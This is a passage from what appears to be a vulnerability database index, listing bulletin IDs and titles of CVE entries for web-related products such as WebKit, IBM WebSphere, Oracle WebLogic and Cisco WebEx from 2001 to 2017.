CVE-2017-1126 Information Disclosure Vulnerability [101073] IBM WebSphere Commerce CVE-2017-1569 Unspecified Denial of Service Vulnerability [101017] IBM WebSphere Portal CVE-2017-1577 Directory Traversal Vulnerability [101006] WebKit Multiple Arbitrary Code Execution Vulnerabilities [101005] Webkit CVE-2017-7109 Cross Site Scripting Vulnerability [100998] WebKit Multiple Memory Corruption Vulnerabilities [100996] WebKit CVE-2017-7142 Information Disclosure Vulnerability [100995] WebKit Same Origin Policy Security Bypass And Memory Corruption Vulnerabilities [100994] WebKit Multiple Memory Corruption Vulnerabilities [100991] WebKit CVE-2017-7144 Information Disclosure Vulnerability [100986] WebKit CVE-2017-7111 Memory Corruption Vulnerability [100985] WebKit Multiple Memory Corruption Vulnerabilities [100951] IniNet Solutions SCADA Web Server CVE-2017-13995 Authentication Bypass Vulnerability [100932] Cisco UCS Central Software Command Line Interface CVE-2017-12255 Command Injection Vulnerability [100893] WebKit Multiple Security Vulnerabilities [100849] Pivotal Spring Web Flow CVE-2017-8039 Incomplete Fix Security Bypass Vulnerability [100830] Mongoose Web Server CVE-2017-11567 Cross Site Request Forgery Vulnerability [100805] SAP NetWeaver Web Dynpro Java Cross Site Scripting Vulnerability [100786] SAP Web Dynpro ABAP Unspecified Cross Site Scripting Vulnerability [100755] Microsoft Windows Graphics Device Interface CVE-2017-8676 Local Information Disclosure Vulnerability [100699] IBM WebSphere Portal CVE-2017-1189 Cross Site Scripting Vulnerability [100668] SpiderControl SCADA Web Server CVE-2017-12728 Local Code Execution Vulnerability [100613] WebKit CVE-2017-7071 Use-After-Free Remote Code Execution Vulnerability [100535] NetApp StorageGRID Webscale CVE-2017-12422 Arbitrary File Deletion Vulnerability [100531] IBM Sametime Web Player CVE-2016-2980 Arbitrary Script Injection Vulnerability [100526] Advantech WebAccess ICSA-17-241-02 Multiple Security Vulnerabilities [100456] SpiderControl SCADA Web Server CVE-2017-12694 Directory Traversal Vulnerability [100394] IBM WebSphere Application Server CVE-2017-1501 Information Disclosure Vulnerability [100231] Advantech WebAccess SQL Injection Vulnerability [100221] Advantech WebAccess 'nvA1Media.ocx' Stack Buffer Overflow Vulnerability [100216] Advantech WebAccess Stack Buffer Overflow Vulnerability [100205] Fortinet Fortiweb CVE-2017-7737 Information Disclosure Vulnerability [100177] SAP NetWeaver K.M. Web Page Composer URI Redirection Vulnerability [100167] SAP Web Intelligence BI Launchpad SSRF Security Bypass Vulnerability [100165] SAP Customer Relationship Management (CRM) WebClient UI Cross Site Scripting Vulnerability [100137] IBM WebSphere Application Server CVE-2017-1504 Information Disclosure Vulnerability [100021] IBM WebSphere MQ Internet Pass-Thru CVE-2017-1118 Denial of Service Vulnerability [100007] IBM WebSphere Portal CVE-2017-1303 Cross Site Scripting Vulnerability [99967] Cisco Web Security Appliance CVE-2017-6751 Remote Security Bypass Vulnerability [99965] Telerik Web UI CVE-2017-9248 Cryptographic Security Bypass Vulnerability [99961] IBM WebSphere Application Server CVE-2017-1380 Cross Site Scripting Vulnerability [99960] IBM WebSphere Application Server CVE-2017-1382 Local Security Bypass Vulnerability [99924] Cisco AsyncOS for Web Security Appliance CVE-2017-6750 Insecure Default Password Vulnerability [99918] Cisco Web Security Appliance CVE-2017-6748 Local Command Injection Vulnerability [99917] IBM WebSphere Application Server CVE-2017-1381 Local Information Disclosure Vulnerability [99888] WebKit CVE-2017-7038 Cross Site Scripting Vulnerability [99885] WebKit Multiple Memory Corruption Vulnerabilities [99875] Cisco Web Security Appliance CVE-2017-6749 HTML Injection Vulnerability [99807] Oracle WebCenter Content CVE-2017-10075 Remote Security Vulnerability [99801] Oracle WebCenter Content CVE-2017-10040 Remote Security Vulnerability [99653] Oracle WebLogic Server CVE-2017-10063 Remote Security Vulnerability [99652] Oracle WebLogic Server CVE-2017-10148 Remote Security Vulnerability [99651] Oracle WebLogic Server CVE-2017-10147 Remote Security Vulnerability [99650] Oracle WebLogic Server CVE-2017-10123 Remote Security Vulnerability [99644] Oracle WebLogic Server CVE-2017-10178 Remote Security Vulnerability [99634] Oracle WebLogic Server CVE-2017-10137 Remote Security Vulnerability [99614] Cisco WebEx Browser Extension CVE-2017-6753 Remote Code Execution Vulnerability [99493] IBM WebSphere MQ CVE-2017-1337 Plaintext Credentials Information Disclosure Vulnerability [99491] IBM WebSphere Commerce CVE-2017-1398 Unspecified Open Redirection Vulnerability [99476] Advantech WebOP Designer Heap Buffer Overflow Vulnerability [99373] Webmin CVE-2017-9313 Multiple Cross Site Scripting Vulnerabilities [99368] IBM Integration Bus and WebSphere Message Broker Local Information Disclosure Vulnerability [99365] IBM Integration Bus and WebSphere Message Broker CVE-2017-1144 Local Denial of Service Vulnerability [99350] IBM WebSphere Portal CVE-2017-1217 Cross Site Scripting Vulnerability [99343] Siemens Viewport for Web Office Portal CVE-2017-6869 Remote Security Bypass Vulnerability [99232] OpenWebif Plugin CVE-2017-9807 Arbitrary Code Execution Vulnerability [99196] Cisco WebEx Network Recording Player CVE-2017-6669 Multiple Buffer Overflow Vulnerabilities [99193] Foscam C1 Webcam CVE-2016-8731 Hard Coded Credentials Authentication Bypass Vulnerability [99136] IBM WebSphere MQ CVE-2017-1117 Denial of Service Vulnerability [99115] WebKit CVE-2017-7005 Type Confusion Remote Code Execution Vulnerability [99070] SAP Web Dispatcher Remote Code Injection Vulnerability [99058] OSIsoft PI Web API CVE-2017-7926 Cross-Site Request Forgery Vulnerability [99038] SAP BusinessObjects Web Intelligence Unspecified Cross Site Scripting Vulnerability [99016] Sophos Web Appliance CVE-2017-9523 Cross Site Scripting Vulnerability [98785] Pivotal Spring Web Flow CVE-2017-4971 Security Bypass Vulnerability [98770] IBM WebSphere MQ CVE-2016-6089 Local Security Bypass Vulnerability [98700] WebKit CVE-2017-2493 Same Origin Policy Security Bypass Vulnerability [98673] Roundcube Webmail CVE-2015-5382 Information Disclosure Vulnerability [98671] Roundcube Webmail CVE-2015-5381 Cross Site Scripting Vulnerability [98602] Multiple BestWebSoft WordPress Plugins CVE-2017-2171 Cross Site Scripting Vulnerability [98544] Schneider Electric Wonderware InduSoft Web Studio Local Privilege Escalation Vulnerability [98473] Webkit Cross Site Scripting and Arbitrary Code Execution Vulnerabilities [98456] WebKit CVE-2017-2521 Unspecified Memory Corruption Vulnerability [98455] WebKit CVE-2017-2530 Memory Corruption Vulnerability [98454] WebKit CVE-2017-6984 Unspecified Memory Corruption Vulnerability [98445] RoundCube Webmail CVE-2017-8114 Multiple Privilege Escalation Vulnerabilities [98419] IBM WebSphere Application Server CVE-2017-1137 Information Disclosure Vulnerability [98387] Cisco WebEx Meetings Server CVE-2017-6651 Information Disclosure Vulnerability [98382] Fortinet Fortiweb CVE-2017-3129 Cross Site Scripting Vulnerability [98340] IBM WebSphere Portal CVE-2017-1156 Unspecified Open Redirection Vulnerability [98338] IBM WebSphere Cast Iron Solution CVE-2016-9691 XML External Entity Denial of Service Vulnerability [98337] IBM WebSphere Cast Iron Solution CVE-2016-9692 Denial of Service Vulnerability [98311] Advantech WebAccess CVE-2017-7929 Directory Traversal Vulnerability [98298] Microsoft Windows Graphics Device Interface CVE-2017-0190 Information Disclosure Vulnerability [98142] IBM WebSphere Application Server CVE-2017-1194 Cross Site Request Forgery Vulnerability [98091] WordPress CopySafe Web Protection Plugin CVE-2017-8100 Cross Site Request Forgery Vulnerability [98027] IBM WebSphere Commerce CVE-2017-1170 Local Session Hijacking Vulnerability [98004] Opera Web Browser CVE-2016-4075 Address Bar Spoofing Vulnerability [97907] Oracle WebCenter Sites CVE-2017-3603 Remote Security Vulnerability [97905] Oracle WebCenter Sites CVE-2017-3598 Remote Security Vulnerability [97904] Oracle WebCenter Sites CVE-2017-3597 Remote Security Vulnerability [97901] Oracle WebCenter Sites CVE-2017-3594 Remote Security Vulnerability [97899] Oracle WebCenter Sites CVE-2017-3591 Remote Security Vulnerability [97894] Oracle WebLogic Server CVE-2017-3531 Remote Security Vulnerability [97887] Oracle WebCenter Sites CVE-2017-3595 Remote Security Vulnerability [97884] Oracle WebLogic Server CVE-2017-3506 Remote Security Vulnerability [97879] Oracle WebCenter Sites CVE-2017-3593 Remote Security Vulnerability [97875] Oracle WebCenter Sites CVE-2017-3596 Remote Security Vulnerability [97842] Oracle WebCenter Sites CVE-2017-3554 Remote Security Vulnerability [97823] Oracle WebCenter Sites CVE-2017-3602 Remote Security Vulnerability [97809] Oracle WebCenter Sites CVE-2017-3541 Remote Security Vulnerability [97804] Oracle WebCenter Sites CVE-2017-3545 Remote Security Vulnerability [97769] Oracle WebCenter Content CVE-2017-3625 Remote Security Vulnerability [97768] Oracle WebCenter Sites CVE-2017-3543 Remote Security Vulnerability [97760] Oracle WebCenter Sites CVE-2017-3542 Remote Security Vulnerability [97753] Oracle WebCenter Sites CVE-2017-3540 Remote Security Vulnerability [97578] SAP Web Dynpro Flash Island XML External Entity Injection Vulnerability [97495] WebsiteBaker CVE-2017-7410 Multiple SQL Injection Vulnerabilities [97492] Trend Micro InterScan Web Security Virtual Appliance CVE-2017-6339 Security Bypass Vulnerability [97487] Trend Micro InterScan Web Security Virtual Appliance CVE-2017-6340 HTML Injection Vulnerability [97482] Trend Micro InterScan Web Security Virtual Appliance Privilege Escalation Vulnerability [97384] WebORB for Java Remote Code Execution and XML External Entity Injection Vulnerabilities [97311] Magmi 'magmi/web/ajax_gettime.php' Cross Site Scripting Vulnerability [97310] Openeclass 'webconf/webconf.php' Multiple Cross Site Scripting Vulnerabilities [97298] WebKit CVE-2017-5949 Denial of Service Vulnerability [97261] Sophos Web Appliance Multiple Command Injection and Session Fixation Vulnerabilities [97176] WebKit Memory Corruption and Information Disclosure Vulnerabilities [97174] CODESYS Web Server Stack Based Buffer Overflow and File Upload Vulnerabilities [97143] WebKit CVE-2017-2415 Remote Code Execution Vulnerability [97133] WebKit CVE-2017-2471 Remote Code Execution Vulnerability [97130] WebKit Multiple Security Vulnerabilities [97075] IBM WebSphere Portal CVE-2017-1120 Cross Site Scripting Vulnerability [97039] LastPass 'websiteConnector.js' Remote Code Execution Vulnerability [96939] MaNGOSWebV4 Multiple Cross Site Scripting Vulnerabilities [96935] webpagetest Multiple Cross Site Scripting Vulnerabilities [96923] Security guide for website operators CVE-2017-2128 OS Command Injection Vulnerability [96918] Cisco WebEx Meetings Server CVE-2017-3880 Authentication Bypass Vulnerability [96912] Cisco WebEx Meetings Server CVE-2017-3811 XML External Entity Information Disclosure Vulnerability [96906] WordPress Webapp-Builder Plugin CVE-2017-1002002 Arbitrary File Upload Vulnerability [96879] SAP Web Dynpro ABAP Unspecified Cross Site Scripting Vulnerability [96876] SAP HANA Web Workbench SQL Injection Vulnerability [96841] IBM WebSphere Application Server CVE-2017-1151 Remote Privilege Escalation Vulnerability [96759] IBM WebSphere MQ CVE-2017-1145 Denial of Service Vulnerability [96624] IBM WebSphere Commerce CVE-2016-5894 Local Information Disclosure Vulnerability [96584] MaNGOSWebV4 CVE-2017-6478 Cross Site Scripting Vulnerability [96556] EPSON TMNet WebConfig CVE-2017-6443 Multiple HTML Injection Vulnerabilities [96553] WPO-Foundation WebPageTest CVE-2017-6396 Cross Site Scripting Vulnerability [96542] Eaton xComfort Ethernet Communication Interface CVE-2017-9368 Information Disclosure Vulnerability [96511] Drupal RESTful Web Services Information Disclosure Vulnerability [96441] IBM WebSphere MQ CVE-2016-9009 Denial of Service Vulnerability [96412] IBM WebSphere MQ CVE-2016-8986 Denial of Service Vulnerability [96403] IBM WebSphere MQ CVE-2016-8915 Denial of Service Vulnerability [96400] IBM WebSphere MQ CVE-2016-3052 Information Disclosure Vulnerability [96394] IBM WebSphere MQ CVE-2016-3013 Denial of Service Vulnerability [96387] RoundCube Webmail CVE-2015-2180 Remote Command Execution Vulnerability [96337] WebKit CVE-2016-7762 Cross Site Scripting Vulnerability [96297] Symantec Web Gateway CVE-2016-9096 Multiple Cross Site Scripting Vulnerabilities [96279] IBM WebSphere Message Broker CVE-2016-9010 Clickjacking Vulnerability [96274] IBM Integration Bus and WebSphere Message Broker XML External Entity Injection Vulnerability [96252] Trend Micro InterScan Web Security Virtual Appliance Multiple Security vulnerabilities [96227] Webmin Unspecified Multiple Cross Site Scripting Vulnerabilities [96210] Advantech WebAccess CVE-2017-5175 DLL Loading Local Code Execution Vulnerability [96164] IBM WebSphere Application Server CVE-2017-1121 Cross Site Scripting Vulnerability [96125] ZoneMinder 'web/views/file.php' Local File Include Vulnerability [96076] IBM WebSphere Application Server CVE-2016-9736 Information Disclosure Vulnerability [95971] Honeywell XL Web II Controller Multiple Security Vulnerabilities [95858] Sophos Web Appliance CVE-2016-9554 Remote Command Injection Vulnerability [95853] Sophos Web Appliance CVE-2016-9553 Multiple Remote Command Injection Vulnerabilities [95820] EMC RSA Web Threat Detection CVE-2016-0919 Unspecified HTML Injection Vulnerability [95737] Cisco WebEx Extension 'magic URL' Remote Command Execution Vulnerability [95736] WebKit Multiple Memory Corruption Vulnerabilities [95735] Webkit CVE-2017-2371 Security Bypass Vulnerability [95728] WebKit CVE-2017-2363 Cross-Origin Security Bypass Vulnerability [95727] WebKit Multiple Security Vulnerabilities [95725] WebKit CVE-2017-2364 Cross-Origin Security Bypass Vulnerability [95676] Weblate CVE-2017-5537 Information Disclosure Vulnerability [95650] IBM WebSphere Application Server CVE-2016-8919 Denial of Service Vulnerability [95643] Cisco WebEx Meetings Server CVE-2017-3795 Local Security Bypass Vulnerability [95642] Cisco WebEx Meeting Center CVE-2017-3799 Open Redirection Vulnerability [95641] Cisco WebEx Meetings Server CVE-2017-3796 Remote Command Execution Vulnerability [95639] Cisco WebEx Meetings Server CVE-2017-3797 Information Disclosure Vulnerability [95635] Cisco WebEx Meetings Server CVE-2017-3794 Cross Site Request Forgery Vulnerability [95465] Oracle WebLogic Server CVE-2017-3248 Remote Security Vulnerability [95416] Web Client CVE-2017-5151 Unspecified SQL Injection Vulnerability [95410] Advantech WebAccess 'updateTemplate.aspx' SQL Injection and Authentication Bypass Vulnerabilities [95355] OSIsoft PI Coresight and PI Web API CVE-2017-5153 Information Disclosure Vulnerability [95317] IBM WebSphere MQ CVE-2016-0360 Remote Code Execution Vulnerability [95312] Olive Design WEB SCHEDULE 'month' Parameter Cross Site Scripting Vulnerability [95293] Joomla! aWeb Cart Watching System Extension CVE-2016-10114 Multiple SQL Injection Vulnerabilities [95154] IBM WebSphere Application Server CVE-2016-8934 Cross Site Scripting Vulnerability [95103] IBM Security Access Manager for Web CVE-2016-3045 Information Disclosure Vulnerability [95060] Vesta Control Panel 'bin/v-get-web-domain-value' Script Local Command Injection Vulnerability [94962] Siemens Desigo PX Web Modules CVE-2016-9154 Insufficient Entropy Vulnerability [94913] WebKit CVE-2016-7623 Information Disclosure Vulnerability [94909] WebKit CVE-2016-7592 Denial of Service Vulnerability [94782] Sauter NovaWeb Web HMI CVE-2016-5782 Authentication Bypass Vulnerability [94774] Cisco Web Security Appliance CVE-2016-9212 Remote Security Bypass Vulnerability [94641] IBM WebSphere Message Broker CVE-2016-6080 Information Disclosure Vulnerability [94599] Boa Webserver CVE-2016-9564 Stack Buffer Overflow Vulnerability [94597] Lenovo System Interface Foundation CVE-2016-8223 Local Privilege Escalation Vulnerability [94430] WebKit CVE-2016-4764 Multiple Memory Corruption Vulnerabilities [94413] IBM Web Content Manager Production Analytics Unspecified Cross Site Scripting Vulnerability [94383] Apereo Webproxy Portlet Information Disclosure Vulnerability [94274] Sophos Web Appliance Privilege Escalation and Remote Code Execution Vulnerabilities [94174] SAP NetWeaver Java AS 'Webdynpro' Component Information Disclosure Vulnerability [93949] WebKit Memory Corruption and Information Disclosure Vulnerabilities [93928] Libwebp 'gif2webp.c' Multiple Integer Overflow Vulnerabilities [93911] Cisco AsyncOS for Email and Web Security Appliances Remote Security Bypass Vulnerability [93873] IBM WebSphere Commerce CVE-2016-6090 Information Disclosure Vulnerability [93853] WebKit CVE-2016-4677 Memory Corruption Vulnerability [93851] WebKit Multiple Security Vulnerabilities [93791] Drupal Webform Module Access Bypass Vulnerability [93692] Oracle WebLogic Server CVE-2016-5535 Remote Code Execution Vulnerability [93552] OSIsoft PI Web API 2015 R2 CVE-2016-8353 Account Permission Security Vulnerability [93529] Juniper Junos J-Web CVE-2016-4923 Cross Site Scripting Vulnerability [93477] Webmin Usermin CVE-2016-4897 Multiple Cross Site Scripting Vulnerabilities [93352] INDAS Web SCADA CVE-2016-8343 Directory Traversal Vulnerability [93284] Symantec Web Gateway CVE-2016-5313 Command Injection Vulnerability [93184] libgd 'gd_webp.c' Integer Overflow Vulnerability [93162] IBM WebSphere Application Server CVE-2016-5983 Remote Code Execution Vulnerability [93146] IBM WebSphere MQ CVE-2016-0379 Denial of Service Vulnerability [93143] IBM WebSphere Application Server Liberty CVE-2016-0378 Information Disclosure Vulnerability [93053] Apple Safari/Webkit/iOS Multiple Security Vulnerabilities [93017] IBM WebSphere Portal CVE-2016-5954 Denial of Service Vulnerability [93013] IBM WebSphere Application Server CVE-2016-5986 Information Disclosure Vulnerability [92986] IBM WebSphere Application Server Liberty CVE-2016-3040 Open Redirect Vulnerability [92985] IBM WebSphere Application Server Liberty Profile CVE-2016-3042 Cross Site Scripting Vulnerability [92959] Cisco WebEx Meetings Server CVE-2016-1482 Command Injection Vulnerability [92957] Cisco WebEx Meetings Server CVE-2016-1483 Denial of Service Vulnerability [92955] Cisco Web Security Appliance CVE-2016-6407 Denial of Service Vulnerability [92899] Blue Coat K9 Web Protection DLL Loading Remote Code Execution Vulnerability [92874] Google Nexus JQualcomm Radio Interface Layer CVE-2016-3864 Privilege Escalation Vulnerability [92711] Cisco WebEx Meetings Player CVE-2016-1415 Denial of Service Vulnerability [92708] Cisco WebEx Meetings Player CVE-2016-1464 Remote Code Execution Vulnerability [92701] Opera Web Browser for Android CVE-2016-6908 Unspecified Address Bar Spoofing Vulnerability [92690] WebKit CVE-2016-4588 Unspecified Memory Corruption Vulnerability [92654] RoundCube Webmail CVE-2016-4069 Cross Site Request Forgery Vulnerability [92653] WebKit CVE-2016-4657 Unspecified Memory Corruption Vulnerability [92603] Splunk Web Unspecified Open Redirection Vulnerability [92562] PHP 'ext/curl/interface.c' Denial of Service Vulnerability [92536] OSSEC Web UI CVE-2016-4847 Unspecified Cross Site Scripting Vulnerability [92526] Navis WebAccess Unspecified SQL Injection Vulnerability [92519] Cisco WebEx Meetings Server CVE-2016-1484 Information Disclosure Vulnerability [92514] IBM WebSphere Application Server CVE-2016-0377 Information Disclosure Vulnerability [92505] IBM WebSphere Application Server CVE-2016-0385 Security Bypass Vulnerability [92405] Drupal Piwik Web Analytics Module Cross Site Scripting Vulnerability [92402] WebNMS Framework Multiple Security Vulnerabilities [92366] ownCloud WebDAV 'COPY' action Security Bypass Vulnerability [92354] IBM WebSphere Application Server CVE-2016-2960 Denial of Service Vulnerability [92344] IBM Connections Portlets For WebSphere Portal CVE-2016-2989 Open Redirect Vulnerability [92217] WebKit Multiple Memory Corruption Vulnerabilities [92197] Fotoware Fotoweb 'to' Parameter Cross Site Scripting Vulnerability [92184] Splunk Web Unspecified Cross Site Scripting Vulnerability [92183] Splunk Web Unspecified Open Redirection Vulnerability [92180] IBM WebSphere Portal CVE-2016-2925 Unspecified Cross Site Scripting Vulnerability [92147] Barracuda Web App Firewall and Load Balancer Arbitrary Command Injection Vulnerability [92072] PHP 'interface.c' Heap Corruption Denial of Service Vulnerability [92030] Oracle WebCenter Sites CVE-2016-3502 Remote Security Vulnerability [92025] Oracle WebCenter Sites CVE-2016-3487 Remote Security Vulnerability [92019] Oracle WebLogic Server CVE-2016-3499 Remote Security Vulnerability [92016] Oracle WebLogic Server CVE-2016-3586 Remote Security Vulnerability [92013] Oracle WebLogic Server CVE-2016-3510 Remote Security Vulnerability [92003] Oracle WebLogic Server CVE-2016-3445 Remote Security Vulnerability [91835] WebKit Content Spoofing and Cross Site Scripting Vulnerabilities [91827] WebKit CVE-2016-4586 Multiple Unspecified Memory Corruption Vulnerabilities [91799] Cisco WebEx Meetings Server CVE-2016-1448 Cross Site Request Forgery Vulnerability [91786] Cisco WebEx Meetings Server CVE-2016-1446 SQL Injection Vulnerability [91781] Cisco WebEx Meetings Server CVE-2016-1447 Cross Site Scripting Vulnerability [91780] Cisco WebEx Meetings Server CVE-2016-1449 Cross Site Scripting Vulnerability [91779] Cisco WebEx Meetings Server CVE-2016-1450 Command Injection Vulnerability [91771] Fortinet FortiWeb CVE-2016-5092 Directory Traversal Vulnerability [91768] Fortinet FortiWeb CVE-2016-4066 Cross Site Request Forgery Vulnerability [91762] Drupal RESTful Web Services Module Remote Code Execution Vulnerability [91759] Juniper Junos J-Web CVE-2016-1279 Remote Privilege Escalation Vulnerability [91749] Drupal Webform Multiple File Upload Module Remote Code Execution Vulnerability [91670] Moxa Device Server Web Console CVE-2016-4503 Authorization Bypass Vulnerability [91572] Rexroth Bosch BLADEcontrol-WebVIS SQL Injection and Cross Site Scripting Vulnerabilities [91551] IBM WebSphere DataPower XC10 CVE-2016-2870 Denial of Service Vulnerability [91544] IBM WebSphere Commerce CVE-2016-2863 Unspecified Cross Site Request Forgery Vulnerability [91533] IBM WebSphere Commerce CVE-2016-2862 Unspecified Cross Site Scripting Vulnerability [91518] IBM WebSphere Application Server Liberty Profile CVE-2016-2923 Information Disclosure Vulnerability [91517] WebSphere Application Server Liberty Profile Remote Privilege Escalation Vulnerability [91515] IBM WebSphere Application Server Liberty CVE-2016-0389 Information Disclosure Vulnerability [91484] IBM WebSphere Application Server CVE-2016-0359 HTTP Response Splitting Vulnerability [91468] Palo Alto Networks API Management Interface Denial of Service Vulnerability [91458] Cisco Web Security Appliance CVE-2016-1440 Denial of Service Vulnerability [91358] WebKit CVE-2016-1864 Information Disclosure Vulnerability [91346] Advantech WebAccess Multiple Security Vulnerabilities [91258] IBM WebSphere Portal CVE-2016-2901 Cross Site Request Forgery Vulnerability [91238] WebARENA Service formmail CVE-2016-1230 Unspecified Cross Site Scripting Vulnerability [91206] SAP Web-Survey XML External Entity Injection Vulnerability [91077] VTScada WAP interface Multiple Security Vulnerabilities [91073] IBM WebSphere MQ CVE-2015-7462 Local Information Disclosure Vulnerability [91064] IBM WebSphere MQ CVE-2015-7473 Local Security Bypass Vulnerability [91060] IBM WebSphere MQ CVE-2016-0260 Denial of Service Vulnerability [91050] Google Android libwebm CVE-2016-2464 Memory Corruption Vulnerability [91041] IBM WebSphere MQ CVE-2016-0259 Local Information Disclosure Vulnerability [90987] Fonality HUDweb Plugin Multiple Security Vulnerabilities [90953] Websockify 'websocket.c' Buffer Overflow Vulnerability [90951] IBM WebSphere eXtreme Scale CVE-2016-0400 HTTP Response Splitting Vulnerability [90950] IBM WebSphere eXtreme Scale CVE-2016-2861 Information Disclosure Vulnerability [90908] Cisco WebEx Meeting Center CVE-2016-1410 User Enumeration Vulnerability [90880] RoundCube Webmail 'content page' HTML-injection Vulnerability [90809] Collectd-web 'ajax_post.php' Cross Site Scripting Vulnerability [90790] Trend Micro InterScan Web Security Virtual Appliance Multiple Remote Code Execution Vulnerabilities [90769] Epoch Web Mailing List CVE-2016-1211 Cross Site Scripting Vulnerability [90748] HP RESTful Interface Tool CVE-2016-2023 Unspecified Local Information Disclosure Vulnerability [90702] web2py Multiple Security Vulnerabilities [90638] Multiple Meteocontrol WEB'log Products CVE-2016-2296 Information Disclosure Vulnerability [90632] Multiple Meteocontrol WEB'log Products CVE-2016-2297 Remote Command Execution Vulnerability [90629] Multiple Meteocontrol WEB'log Products CVE-2016-2298 Information Disclosure Vulnerability [90599] Opera Web Browser CVE-2004-0717 Remote Security Vulnerability [90593] WebSTAR CVE-2004-0697 Information Disclosure Vulnerability [90587] Netfile Ftp Web Server CVE-2004-0677 Denial-Of-Service Vulnerability [90581] Websphere Edge server Caching proxy CVE-2004-0684 Denial-Of-Service Vulnerability [90577] WebSTAR CVE-2004-0698 Local Security Vulnerability [90576] Opera Web Browser CVE-2004-0872 Remote Security Vulnerability [90492] Opera Web Browser CVE-2004-1489 Information Disclosure Vulnerability [90404] Twilight Utilities Web Server CVE-2004-2380 Directory Traversal Vulnerability [90403] Twilight Utilities Web Server CVE-2004-2376 Denial-Of-Service Vulnerability [90342] 04Webserver CVE-2004-2661 Information Disclosure Vulnerability [90322] 04Webserver CVE-2004-2662 Denial-Of-Service Vulnerability [90283] WebSeries Payment Application CVE-2005-0287 Remote Security Vulnerability [90269] Opera Web Browser CVE-2005-0457 Local Security Vulnerability [90257] Weblogic Server CVE-2005-0432 Remote Security Vulnerability [90252] Websphere Application Server CVE-2005-0425 Remote Security Vulnerability [90240] webmin-1.140.ebuild CVE-2005-0427 Remote Security Vulnerability [90231] Phpwebsite CVE-2005-0572 Information Disclosure Vulnerability [90224] WebMod CVE-2005-0608 Denial-Of-Service Vulnerability [90215] Phpwebsite CVE-2005-0565 Remote Security Vulnerability [90204] Active WebCam CVE-2005-0733 Remote Security Vulnerability [90193] Active WebCam CVE-2005-0732 Remote Security Vulnerability [90181] Active WebCam CVE-2005-0731 Denial-Of-Service Vulnerability [90178] Active WebCam CVE-2005-0730 Denial-Of-Service Vulnerability [90171] WebSVN CVE-2016-1236 Cross Site Scripting Vulnerability [90152] Active WebCam CVE-2005-0734 Denial-Of-Service Vulnerability [90148] WebAPP CVE-2005-0927 Remote Security Vulnerability [90128] Webcamxp Pro CVE-2005-1190 Denial-Of-Service Vulnerability [90117] Java System Web Server CVE-2005-1150 Denial-Of-Service Vulnerability [90088] Web Security CVE-2005-1346 Denial-Of-Service Vulnerability [89960] Webcam Lite CVE-2005-1617 Information Disclosure Vulnerability [89950] Jeuce Personal Web Server CVE-2005-1661 Denial-Of-Service Vulnerability [89946] Netfile Ftp Web Server CVE-2005-1646 Denial-Of-Service Vulnerability [89909] Nextweb (i)Site CVE-2005-1836 Denial-Of-Service Vulnerability [89899] Java System Web Server CVE-2005-1889 Remote Security Vulnerability [89870] Liteweb CVE-2005-1908 Security Bypass Vulnerability [89837] Web Frontend CVE-2005-2029 Remote Security Vulnerability [89815] Webserver CVE-2005-2008 Remote Security Vulnerability [89769] Community Link Pro Web Editor CVE-2005-2111 Remote Security Vulnerability [89683] Webx CVE-2001-1532 Remote Security Vulnerability [89675] Webmin CVE-2001-1530 Local Security Vulnerability [89627] Webx CVE-2001-1532 Remote Security Vulnerability [89619] Webmin CVE-2001-1530 Local Security Vulnerability [89565] KF Web Server CVE-2002-1032 Denial-Of-Service Vulnerability [89559] Jana Web Server CVE-2002-1065 Remote Security Vulnerability [89556] LocalWEB2000 CVE-2002-1353 Remote Security Vulnerability [89554] Webserver 4 Everyone CVE-2002-1504 Directory Traversal Vulnerability [89517] SuperScout Web Filter for Windows NT/2000 CVE-2002-0706 Remote Security Vulnerability [89515] Webmin CVE-2002-2201 Remote Security Vulnerability [89509] IBM AIX Websecure CVE-2002-1040 Remote Security Vulnerability [89483] Office Web Components 2002 CVE-2002-1339 Remote Security Vulnerability [89475] Office Web Components 2002 CVE-2002-1340 Remote Security Vulnerability [89473] Wwwebbb Forum CVE-2002-2085 Directory Traversal Vulnerability [89464] GoAhead WebServer CVE-2002-0680 Directory Traversal Vulnerability [89444] Opera Web Browser CVE-2005-2273 Remote Security Vulnerability [89437] Opera Web Browser CVE-2005-2309 Denial-Of-Service Vulnerability [89402] Website Baker CVE-2005-2436 Remote Security Vulnerability [89384] Savewebportal CVE-2005-2687 Remote Security Vulnerability [89374] WebLogic Portal CVE-2005-2680 Security Bypass Vulnerability [89373] Savewebportal CVE-2005-2686 Directory Traversal Vulnerability [89370] Savewebportal CVE-2005-2685 Remote Security Vulnerability [89366] PHP Weblog CVE-2005-2722 Information Disclosure Vulnerability [89354] Savant Webserver CVE-2005-2859 Local Security Vulnerability [89341] Cisco WebEx Productivity Tools CVE-2016-4349 DLL Loading Local Code Execution Vulnerabilities [89338] Web News CVE-2005-2897 Information Disclosure Vulnerability [89309] Web Mail CVE-2005-3132 Information Disclosure Vulnerability [89304] vxWeb CVE-2005-3033 Denial-Of-Service Vulnerability [89290] Opera Web Browser CVE-2005-3059 Remote Security Vulnerability [89268] Dr.Web Antivirus CVE-2005-3218 Security Bypass Vulnerability [89219] Opera Web Browser CVE-2005-3699 Remote Security Vulnerability [89214] Websphere Application Server CVE-2005-3760 Denial-Of-Service Vulnerability [89180] Nextweb %28I%29Site CVE-2005-1834 SQL-Injection Vulnerability [89178] Websphere Application Server CVE-2005-1872 Remote Security Vulnerability [89138] ONE Web Server CVE-2005-2094 Cross-Site Scripting Vulnerability [89116] Weblogic Server CVE-2005-2092 Cross-Site Scripting Vulnerability [89107] Websphere Application Server CVE-2005-2091 Cross-Site Scripting Vulnerability [89098] Dynamic Biz Website Builder Quickweb CVE-2005-2135 SQL-Injection Vulnerability [89051] WebEOC CVE-2005-4029 Remote Security Vulnerability [89047] WebEOC CVE-2005-4002 Remote Security Vulnerability [88975] Javaserver Web Dev Kit CVE-2001-0404 Directory Traversal Vulnerability [88944] WebIntelligence CVE-2005-4274 Denial-Of-Service Vulnerability [88943] Iplanet Web Server CVE-2001-0431 Remote Security Vulnerability [88924] Cisco WebEx Meetings Server CVE-2016-1389 Open Redirection Vulnerability [88921] Webmail CVE-2005-4368 Remote Security Vulnerability [88881] Websphere Plugin CVE-2001-0312 Remote Security Vulnerability [88880] WebSphere Commerce Suite CVE-2001-0446 Remote Security Vulnerability [88865] Content2Web CVE-2005-3017 Cross-Site Scripting Vulnerability [88864] Savant Webserver CVE-2001-0433 Denial-Of-Service Vulnerability [88846] Personal Web Sharing CVE-2001-0649 Denial-Of-Service Vulnerability [88822] Websweeper CVE-2001-0460 Denial-Of-Service Vulnerability [88796] Savewebportal CVE-2005-2688 Cross-Site Scripting Vulnerability [88791] Web-Enabled Management 